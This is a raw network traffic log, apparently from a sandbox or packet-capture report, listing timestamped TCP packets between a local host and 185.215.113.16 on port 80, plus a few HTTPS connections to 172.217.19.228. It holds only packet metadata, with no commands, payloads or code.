Dec 19, 2024 10:10:37.514029980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.514273882 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.514561892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.514765978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.516058922 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.516098976 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.516130924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.516170979 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.518027067 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.518098116 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.518254042 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.518318892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.519716024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.519774914 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.519829035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.519905090 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.521478891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.521549940 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.521637917 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.521692038 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.523432970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.523541927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.523569107 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.524715900 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.526184082 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.526251078 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.526335955 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.526393890 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.529310942 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.529347897 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.529396057 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.529397011 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.531002045 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.531069040 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.531106949 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.533139944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.533199072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.533282995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.535511017 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.535559893 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.535582066 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.536464930 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.537462950 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.537622929 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.537686110 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.539585114 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.539644957 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.539704084 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.541909933 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.541968107 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.542045116 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.542124033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.651205063 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.651287079 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.651303053 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.651556969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.652124882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.652189016 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.652235031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.652343035 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.654367924 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.654442072 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.654452085 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.654550076 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.656214952 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.656320095 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.656344891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.656402111 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.658346891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.658463955 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.658478975 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.658602953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.669003963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.669085979 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.669193983 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.669244051 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.669713974 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.669784069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.669904947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.669955969 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.671389103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.671456099 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.671998978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.672056913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.672095060 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.672307014 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.673489094 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.673620939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.673655987 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.673690081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.675488949 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.675544024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.675550938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.675801992 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.676808119 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.676862955 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.676871061 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.676918030 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.677112103 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.677161932 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.677237034 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.678009033 CET	49938	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.678035975 CET	443	49938	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.678328037 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.678365946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.678421021 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.678456068 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.679253101 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.679297924 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.679356098 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.679620981 CET	49939	443	192.168.2.6	172.217.19.228
Dec 19, 2024 10:10:37.679636002 CET	443	49939	172.217.19.228	192.168.2.6
Dec 19, 2024 10:10:37.679989100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.680042982 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.680104017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.681443930 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.681633949 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.681843996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.683080912 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.683124065 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.683161020 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.683192968 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.684608936 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.684644938 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.686464071 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.686500072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.686590910 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.686827898 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.688235044 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.688329935 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.688349009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.688438892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.690061092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.690200090 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.690248013 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.690615892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.692177057 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.692409039 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.692481041 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.692536116 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.694191933 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.694262981 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.694348097 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.694547892 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.696300030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.696357965 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.696594954 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.696659088 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.698256969 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.698312998 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.698321104 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.698365927 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.700190067 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.700340033 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.700505018 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.701984882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.702060938 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.702145100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.702208996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.704066992 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.704150915 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.704267025 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.704324961 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.706007004 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.706208944 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.706273079 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.707730055 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.707762003 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.707809925 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.707843065 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.709459066 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.709496021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.709547043 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.709578037 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.711353064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.711431980 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.711436033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.711616993 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.713279963 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.713346004 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.713366032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.713453054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.715121031 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.715207100 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.715290070 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.716823101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.716826916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.716866970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.716923952 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.718302965 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.718375921 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.718449116 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.720185995 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.720223904 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.720300913 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.722995996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.723087072 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.723176956 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.734574080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.734754086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.734790087 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.734837055 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.734879017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.734939098 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.734973907 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735009909 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735028028 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.735058069 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.735083103 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735289097 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735346079 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735347986 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.735455990 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735508919 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735510111 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.735543013 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.735563993 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.736160994 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.737346888 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.737382889 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.737400055 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.737426996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.739245892 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.739301920 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.739408970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.740040064 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.740312099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.740348101 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.740408897 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.741851091 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.741885900 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.741944075 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.743830919 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.743896008 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.744020939 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.744106054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.745476007 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.745567083 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.745639086 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.745712996 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.746012926 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.746081114 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.746150970 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.748209953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.750437021 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.750647068 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.750716925 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.751180887 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.751218081 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.751277924 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.751913071 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.751950026 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.751971960 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.752002001 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.753535032 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.753695011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.753762007 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.755217075 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.755250931 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.755326986 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.840382099 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.840425968 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.840513945 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.841228008 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.841378927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.841432095 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.842942953 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.843002081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.843065023 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.844754934 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.844813108 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.844939947 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.846529961 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.846566916 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.846590042 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.846606016 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.848407030 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.848488092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.848570108 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.850018978 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.850075960 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.850130081 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.858562946 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.858620882 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.858700037 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.859170914 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.859349012 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.859415054 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.860742092 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.860891104 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.860944033 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.862210035 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.862318993 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.862324953 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.863909960 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.863970041 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.864034891 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.864285946 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.865909100 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.866105080 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.866199017 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.867698908 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.867814064 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.867878914 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.869143009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.869257927 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.869316101 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.870651007 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.870702028 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.870778084 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.872164011 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.872248888 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.872303009 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.873513937 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.873575926 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.873646975 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.873701096 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.875427008 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.875498056 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.875566959 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.876724005 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.876781940 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.876842976 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.877804041 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.877903938 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.877963066 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.878901005 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.878941059 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.878947020 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.879959106 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.880017996 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.880028963 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.880074978 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.881176949 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.881292105 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.881344080 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.882504940 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.882617950 CET	49928	80	192.168.2.6	185.215.113.16
Dec 19, 2024 10:10:37.882637024 CET	80	49928	185.215.113.16	192.168.2.6
Dec 19, 2024 10:10:37.883546114 CET	49928	80	192.168.2.6	185.215.113.16
